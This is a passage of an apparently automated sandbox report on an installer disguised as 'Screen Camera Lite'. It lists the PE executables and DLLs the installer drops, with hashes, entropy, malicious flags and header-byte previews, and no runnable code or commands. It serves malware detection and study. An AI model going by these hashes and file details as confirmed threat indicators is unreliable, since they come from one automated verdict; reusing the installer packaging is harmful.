                                                            SSDEEP:3072:LrhG5+L/AcY680k2SxVqetJP5Im+A9mNoWqlM5ywwoS:LV6+LA0G0enP5PFYOWi6w1
                                                            MD5:236A679AB1B16E66625AFBA86A4669EB
                                                            SHA1:73AE354886AB2609FFA83429E74D8D9F34BD45F2
                                                            SHA-256:B1EC758B6EDD3E5B771938F1FEBAC23026E6DA2C888321032D404805E2B05500
                                                            SHA-512:C19FA027E2616AC6B4C18E04959DFE081EF92F49A11260BA69AFE10313862E8FEFF207B9373A491649928B1257CF9B905F24F073D11D71DCD29B0F9ADAC80248
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ......;......#...............................c................................q......... .........................,.......<.......H...........................................................................(................................text...............................`.P`.data... ...........................@.0..rdata..|y.......z..................@.`@/4......HN...@...P... ..............@.0@.bss..................................`..edata..,............p..............@.0@.idata..<............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...H...........................@.0..reloc..............................@.0B........................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):259014
                                                            Entropy (8bit):6.075222655669795
                                                            Encrypted:false
                                                            SSDEEP:3072:O4WGkOMuCsxvlBUlthMP3SyyqX3/yfGG7ca/RM3yH8Tw/yr+Jg8jGCzftns9/1tA:tWGkOME304A7ca/RNyN8jGCzftngvA
                                                            MD5:B4FDE05A19346072C713BE2926AF8961
                                                            SHA1:102562DE2240042B654C464F1F22290676CB6E0F
                                                            SHA-256:513CEC3CCBE4E0B31542C870793CCBDC79725718915DB0129AA39035202B7F97
                                                            SHA-512:9F3AEE3EBF04837CEEF08938795DE0A044BA6602AACB98DA0E038A163119C695D9CC2CA413BD709196BFD3C800112ABABC3AF9E2E9A0C77D88BD4A1C88C2ED27
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..............................xe.........................@.......{........ .........................+;......L.......0.................... ..8...................................................h................................text...............................`.P`.data...$...........................@.0..rdata.../.......0..................@.`@/4.......l.......n..................@.0@.bss....,.............................`..edata..+;.......<...d..............@.0@.idata..L...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...0...........................@.0..reloc..8.... ......................@.0B........................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):64724
                                                            Entropy (8bit):5.910307743399971
                                                            Encrypted:false
                                                            SSDEEP:768:U84Oo2LbVtfNsqnYPL7cZ690d+yCG7QiZggD0Spo3YfklbTRPmK0Lz:Uf2LbVtfDGLr2xk4DU3YfkhTRuKW
                                                            MD5:7AF455ADEA234DEA33B2A65B715BF683
                                                            SHA1:F9311CB03DCF50657D160D89C66998B9BB1F40BA
                                                            SHA-256:6850E211D09E850EE2510F6EAB48D16E0458BCE35916B6D2D4EB925670465778
                                                            SHA-512:B8AC3E2766BB02EC37A61218FAF60D1C533C0552B272AF6B41713C17AB69C3731FA28F3B5D73766C5C59794D5A38CC46836FD93255DF38F7A3ABD219D51BB41A
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....h........................lm.........................P................ .................................."...0..`....................@............................... .......................................................text...dg.......h..................`.P`.data...0............l..............@.0..rdata...............n..............@.@@/4......\............z..............@.0@.bss....,.............................`..edata..............................@.0@.idata...".......$..................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc...`....0......................@.0..reloc.......@......................@.0B........................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):92019
                                                            Entropy (8bit):5.974787373427489
                                                            Encrypted:false
                                                            SSDEEP:1536:+j80nVGEhJyBnvQXUDkUPoWCSgZosDGMsZLXWU9+HN4yoRtJJ:C8IgtyUDkBWIZosDGDBXWPHN4yoRtJJ
                                                            MD5:CC7DAD980DD04E0387795741D809CBF7
                                                            SHA1:A49178A17B1C72AD71558606647F5011E0AA444B
                                                            SHA-256:0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
                                                            SHA-512:E4441D222D7859169269CA37E491C37DAA6B3CDD5F4A05A0A246F21FA886F5476092E64DFF88890396EF846B9E8D2880E33F1F594CD61F09023B3EF4CD573EA3
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(....0..7......#.........,.....................m................................B......... ...................... .......0...*...........................................................p......................t5...............................text..............................`.P`.data... ...........................@.0..rdata..............................@.`@/4.......(.......*..................@.0@.bss..................................`..edata....... ......................@.0@.idata...*...0...,..................@.0..CRT....,....`....... ..............@.0..tls.... ....p......."..............@.0..rsrc................$..............@.0..reloc...............(..............@.0B........................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):165739
                                                            Entropy (8bit):6.062324507479428
                                                            Encrypted:false
                                                            SSDEEP:3072:wqozCom32MhGf+cPlDQ6jGQGExqLsGXnru+5FMCp:wqxo4LGlDQ6yQGsqLsGXruSFMCp
                                                            MD5:E2F18B37BC3D02CDE2E5C15D93E38418
                                                            SHA1:1A6C58F4A50269D3DB8C86D94B508A1919841279
                                                            SHA-256:7E555192331655B04D18F40E8F19805670D56FC645B9C269B9F10BF45A320C97
                                                            SHA-512:61AB4F3475B66B04399111B106C3F0A744DC226A59EB03C134AE9216A9EA0C7F9B3B211148B669C32BAFB05851CC6C18BD69EA431DBC2FE25FE470CB4786FD17
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........0.........#.........,.....................n................................&......... .........................y....0...D..................................................................................x7...............................text...............................`.P`.data... ...........................@.0..rdata..............................@.`@/4......Dg.......h..................@.0@.bss....(....p........................`..edata..y............8..............@.0@.idata...D...0...F..................@.0..CRT....,............ ..............@.0..tls.... ............"..............@.0..reloc...............$..............@.0B................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):101544
                                                            Entropy (8bit):6.237382830377451
                                                            Encrypted:false
                                                            SSDEEP:1536:nrYjG+7rjCKdiZ4axdj+nrlv3ecaQZ93yQNMRP2Ea5JPTxi0C9A046QET:M9eKdiBxUnfb3yZROEYJPTxib9A5ET
                                                            MD5:E13FCD8FB16E483E4DE47A036687D904
                                                            SHA1:A54F56BA6253D4DECAAE3DE8E8AC7607FD5F0AF4
                                                            SHA-256:0AC1C17271D862899B89B52FAA13FC4848DB88864CAE2BF4DC7FB81C5A9A49BF
                                                            SHA-512:38596C730B090B19E34183182273146C3F164211644EBC0A698A83651B2753F7D9B1D6EE477D1798BD7219B5977804355E2F57B1C3013BF3D498BF96DEC9D02E
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#.........`....................Hk.................................$........ ......................`..-....p......................................................................................Lt...............................text...............................`.P`.data...L...........................@.0..rdata..............................@.`@/4.......*... ...,..................@.0@.bss.........P........................`..edata..-....`.......*..............@.0@.idata.......p... ...0..............@.0..CRT....,............P..............@.0..tls.... ............R..............@.0..rsrc................T..............@.0..reloc...............X..............@.0B........................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):291245
                                                            Entropy (8bit):6.234245376773595
                                                            Encrypted:false
                                                            SSDEEP:6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
                                                            MD5:2D8A0BC588118AA2A63EED7BF6DFC8C5
                                                            SHA1:7FB318DC21768CD62C0614D7AD773CCFB7D6C893
                                                            SHA-256:707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
                                                            SHA-512:A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........h..@......#.........d....................4i................................<......... ......................p..5.......t...................................................................................<................................text...T...........................`.P`.data...0...........................@.0..rdata...v.......x..................@.`@/4...........@......................@.0@.bss.........`........................`..edata..5....p.......6..............@.0@.idata..t............>..............@.0..CRT....,............F..............@.0..tls.... ............H..............@.0..reloc...............J..............@.0B................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):706136
                                                            Entropy (8bit):6.517672165992715
                                                            Encrypted:false
                                                            SSDEEP:12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
                                                            MD5:3A8A13F0215CDA541EC58F7C80ED4782
                                                            SHA1:085C3D5F62227319446DD61082919F6BE1EFD162
                                                            SHA-256:A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
                                                            SHA-512:4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.......Q......#..............................Pe......................... ................ .........................A.......L............................... ,......................................................,............................text...8...........................`.P`.data...............................@.P..rdata..............................@.`@/4......\............x..............@.0@.bss..................................`..edata..A........ ...^..............@.0@.idata..L............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc.. ,..........................@.0B................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):248781
                                                            Entropy (8bit):6.474165596279956
                                                            Encrypted:false
                                                            SSDEEP:3072:oW4uzRci3pB4FvOhUHN1Dmfk46sR6/9+B7Bt9Z42fTSCi3QUqbQrPeL8rFErGfju:n4uB4FvHNElE9+B7Bj6GTSCiZPNVS
                                                            MD5:C4002F9E4234DFB5DBE64C8D2C9C2F09
                                                            SHA1:5C1DCCE276FDF06E6AA1F6AD4D4B49743961D62D
                                                            SHA-256:F5BC251E51206592B56C3BD1BC4C030E2A98240684263FA766403EA687B1F664
                                                            SHA-512:4F7BC8A431C07181A3D779F229E721958043129BBAEC65A538F2DD6A2CAB8B4D6165B4149B1DF56B31EB062614363A377E1982FD2F142E49DA524C1C96FC862E
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........]......#...............................h......................... .......!........ .........................A.......\.......................................................................................\............................text..............................`.P`.data...T...........................@.0..rdata..P[.......\..................@.`@/4.......v...0...v..................@.0@.bss..................................`..edata..A........ ..................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):248694
                                                            Entropy (8bit):6.346971642353424
                                                            Encrypted:false
                                                            SSDEEP:6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
                                                            MD5:39A15291B9A87AEE42FBC46EC1FE35D6
                                                            SHA1:AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
                                                            SHA-256:7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
                                                            SHA-512:FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....x.........................i.......................................... ......................`..u........1...................................................................................................................text...Tw.......x..................`.P`.data................|..............@.`..rdata..t;.......<...~..............@.`@/4.......f.......h..................@.0@.bss.........P........................`..edata..u....`......."..............@.0@.idata...1.......2...>..............@.0..CRT....,............p..............@.0..tls.... ............r..............@.0..reloc...............t..............@.0B................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):30994
                                                            Entropy (8bit):5.666281517516177
                                                            Encrypted:false
                                                            SSDEEP:768:SrCNSOFBZVDIxxDsIpx0uZjaYNdJSH6J6:SrCyx0maYNdh6
                                                            MD5:3C033F35FE26BC711C4D68EB7CF0066D
                                                            SHA1:83F1AED76E6F847F6831A1A1C00FEDC50F909B81
                                                            SHA-256:9BA147D15C8D72A99BC639AE173CFF2D22574177242A7E6FE2E9BB09CC3D5982
                                                            SHA-512:7811BE5CCBC27234CE70AB4D6541556612C45FE81D5069BA64448E78953387B1C023AA2A04E5DBF8CAACE7291B8B020BEE2F794FBC190837F213B8D6CB698860
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..8......#.....*...l...............@.....j.......................................... .........................a.......(...............................x...................................................,................................text...8(.......*..................`.P`.data... ....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......6..............@.0@.bss..................................`..edata..a............L..............@.0@.idata..(............`..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..x............l..............@.0B................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):448557
                                                            Entropy (8bit):6.353356595345232
                                                            Encrypted:false
                                                            SSDEEP:12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
                                                            MD5:908111F583B7019D2ED3492435E5092D
                                                            SHA1:8177C5E3B4D5CC1C65108E095D07E0389164DA76
                                                            SHA-256:E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
                                                            SHA-512:FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....,...................@.....i......................... ......._........ .........................[.......X...............................(&...................................................... ............................text...d*.......,..................`.P`.data........@.......0..............@.`..rdata......P.......2..............@.`@/4..................................@.0@.bss....|.............................`..edata..[............j..............@.0@.idata..X...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..(&.......(..................@.0B................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):65181
                                                            Entropy (8bit):6.085572761520829
                                                            Encrypted:false
                                                            SSDEEP:768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
                                                            MD5:98A49CC8AE2D608C6E377E95833C569B
                                                            SHA1:BA001D8595AC846D9736A8A7D9161828615C135A
                                                            SHA-256:213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
                                                            SHA-512:C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:modified
                                                            Size (bytes):3532800
                                                            Entropy (8bit):6.72752696267436
                                                            Encrypted:false
                                                            SSDEEP:98304:yID4fjP9DDJlFIc6BcRT7L28gPnL2K2bAmJOIM/z:yID4bPvGcRTP2TnL2K2bAmJOIM/z
                                                            MD5:9773013A29C2D339FD5258A117195F58
                                                            SHA1:78FE3C2CE6FB4A99180054FEA22F3F107125FB94
                                                            SHA-256:014C98BB48D95C970040FE90CF927439D699496820342948156718B688576426
                                                            SHA-512:4DA9C80E69DCC79266774FE81E63652162884CAE982F56AA9815F534EA478097DC5F55E11E9B2091249626ECC01D7FE335343F16AF128121D8DFDE5FBCD30ACB
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...n..L.................."..j.......z"......."...@..........................P6.....0.6.....................................D.".......#...............................................................................".h............................text.....".......".................`....rdata...(...."..*....".............@..@.data....t....#..0....".............@....rsrc.........#.......#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):720373
                                                            Entropy (8bit):6.507195204570607
                                                            Encrypted:false
                                                            SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyFr:nu7eEYCP8trP837szHUA60SLtcV3E9kX
                                                            MD5:634DABE2B890E26FEBE413376E45FDE2
                                                            SHA1:0331D4929ABCAD7520458CAC840346EA7767BE0C
                                                            SHA-256:25676EB0936F9ADA048E436616A9AF80344DFA27C051139F4CDA8421E7633DDC
                                                            SHA-512:ED57435F48C4E88A17F65D075A05DC27E2192209083B331D466A744F40F50D4194128C3ABE5816890ABD37E7D7D08A9F5784D0A5E24C6B8BEE331DC5BB33D5B4
                                                            Malicious:true
                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:InnoSetup Log Screen Camera Lite, version 0x30, 5814 bytes, 642294\user, "C:\Users\user\AppData\Local\Screen Camera Lite"
                                                            Category:dropped
                                                            Size (bytes):5814
                                                            Entropy (8bit):4.779119115021391
                                                            Encrypted:false
                                                            SSDEEP:48:SARDyMdLBoMFbNpUcLUdLFic9N+4bLVO3471/R4uvrNRMRAUTRJROR1R57RbRNR4:phWMdNpx4Ln9N+eOIhzvVU07NyhJ
                                                            MD5:742A2D9B09F05DF7FFDA54711E021025
                                                            SHA1:581C22070987246931EA9DE37609C55826564B1C
                                                            SHA-256:1E2DE4853B598C60F80713D1661A08B081C8D511E0BB54A989F7EE57211A11E0
                                                            SHA-512:96C91A8F5697B13E4697F83360CFB4FA9630ABAACE07419AE763DC45FE5112A0FE1AE6B0A22561271BB91D0F32A2F75F76F6D6AA05C20E0E1887BF2910EF642B
                                                            Malicious:false
                                                            Preview:Inno Setup Uninstall Log (b)....................................Screen Camera Lite..............................................................................................................Screen Camera Lite..............................................................................................................0...".......%...............................................................................................................Occ...........P......O....642294.user/C:\Users\user\AppData\Local\Screen Camera Lite...........)...... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):720373
                                                            Entropy (8bit):6.507195204570607
                                                            Encrypted:false
                                                            SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyFr:nu7eEYCP8trP837szHUA60SLtcV3E9kX
                                                            MD5:634DABE2B890E26FEBE413376E45FDE2
                                                            SHA1:0331D4929ABCAD7520458CAC840346EA7767BE0C
                                                            SHA-256:25676EB0936F9ADA048E436616A9AF80344DFA27C051139F4CDA8421E7633DDC
                                                            SHA-512:ED57435F48C4E88A17F65D075A05DC27E2192209083B331D466A744F40F50D4194128C3ABE5816890ABD37E7D7D08A9F5784D0A5E24C6B8BEE331DC5BB33D5B4
                                                            Malicious:true
                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):98626
                                                            Entropy (8bit):6.478068795827396
                                                            Encrypted:false
                                                            SSDEEP:1536:HDuZqv5WNPuWOD+QZ7OWN4oOlatKZ2XGnToIfQIOEIOGxpdo4VoWsj:r9P6WN4wyTBfGqGxpdo4VoB
                                                            MD5:70CA53E8B46464CCF956D157501D367A
                                                            SHA1:AE0356FAE59D9C2042270E157EA0D311A831C86A
                                                            SHA-256:4A7AD2198BAACC14EA2FFD803F560F20AAD59C3688A1F8AF2C8375A0D6CC9CFE
                                                            SHA-512:CB1D52778FE95D7593D1FDBE8A1125CD19134973B65E45F1E7D21A6149A058BA2236F4BA90C1CE01B1B0AFAD4084468D1F399E98C1F0D6F234CBA023FCC7B4AE
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....='=.x..=......#.........t.....................c.......................................... .................................8...............................0...................................................0................................text...t...........................`.P`.data... ...........................@.0..rdata...M.......N..................@.`@/4......t&...P...(...4..............@.0@.bss..................................`..edata...............\..............@.0@.idata..8............f..............@.0..CRT....,............n..............@.0..tls.... ............p..............@.0..reloc..0............r..............@.0B................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\AyiNxJ98mL.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):709120
                                                            Entropy (8bit):6.498750714093575
                                                            Encrypted:false
                                                            SSDEEP:12288:thu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyF:Pu7eEYCP8trP837szHUA60SLtcV3E9kT
                                                            MD5:16C9D19AB32C18671706CEFEE19B6949
                                                            SHA1:FCA23338CB77068E1937DF4E59D9C963C5548CF8
                                                            SHA-256:C1769524411682D5A204C8A40F983123C67EFEADB721160E42D7BBFE4531EB70
                                                            SHA-512:32B4B0B2FB56A299046EC26FB41569491E8B0CD2F8BEC9D57EC0D1AD1A7860EEC72044DAB2D5044CB452ED46E9F21513EAB2171BAFA9087AF6D2DE296455C64B
                                                            Malicious:true
                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):4096
                                                            Entropy (8bit):4.026670007889822
                                                            Encrypted:false
                                                            SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                            MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                            SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                            SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                            SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2560
                                                            Entropy (8bit):2.8818118453929262
                                                            Encrypted:false
                                                            SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                            MD5:A69559718AB506675E907FE49DEB71E9
                                                            SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                            SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                            SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):19456
                                                            Entropy (8bit):5.8975201046735535
                                                            Encrypted:false
                                                            SSDEEP:384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
                                                            MD5:3ADAA386B671C2DF3BAE5B39DC093008
                                                            SHA1:067CF95FBDB922D81DB58432C46930F86D23DDED
                                                            SHA-256:71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
                                                            SHA-512:BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(............................p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):6144
                                                            Entropy (8bit):4.215994423157539
